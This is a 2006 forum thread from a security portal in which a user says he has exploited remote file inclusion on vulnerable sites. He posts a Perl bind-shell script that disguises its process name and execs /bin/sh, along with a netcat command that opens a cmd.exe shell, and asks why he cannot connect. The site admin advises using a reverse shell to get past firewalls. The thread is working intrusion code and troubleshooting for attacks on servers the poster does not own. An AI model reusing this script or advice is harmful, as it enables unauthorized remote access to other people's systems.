|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Need help binding port/connecting |
|
Posted: Sat Aug 05, 2006 4:58 pm |
|
|
faifas |
Regular user |
|
|
Joined: Feb 25, 2005 |
Posts: 8 |
|
|
|
|
|
|
|
Hey there,
I've managed to find some vulnerable sites with remote fill inclusion.
I've tried 2 different methods:
1. using a lil perl script to bind a port
(downloaded to server using wget)
Code: |
#!/usr/bin/perl
$port = 32767;
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
|
well there was a perl and i've perled the script
perl /tmp/pwnportbindz0r.pl
then accessed cmd and: telnet victimip 32767
Got response: connection refused.
Well nvm i though and downloaded nc.exe (NetCat) to server
with shell tried this:
nc -l -p 2006 -d -e cmd.exe
used putty:
IP: victimip Port: 2006 Protocol: raw
Connection refused.
I simply don't understand what's going on
Any ideas? |
|
|
|
|
|
|
|
|
Posted: Sat Aug 05, 2006 9:15 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This is common situation, that firewall or NAT makes remote shell creating difficult.
So I suggest to try reverse shell:
http://www.plenz.com/reverseshell
Feedback is welcome |
|
|
|
|
Posted: Sat Aug 05, 2006 11:06 pm |
|
|
faifas |
Regular user |
|
|
Joined: Feb 25, 2005 |
Posts: 8 |
|
|
|
|
|
|
|
Ahh, tank you but netcat isn't working for me :/
I'm stupid or my windows need reinstralling, coz i even can't connect to my router :O
EDIT: Anyway maybe i could setup an anonymous proxy for my self in Linux?
Where should i search for info? |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|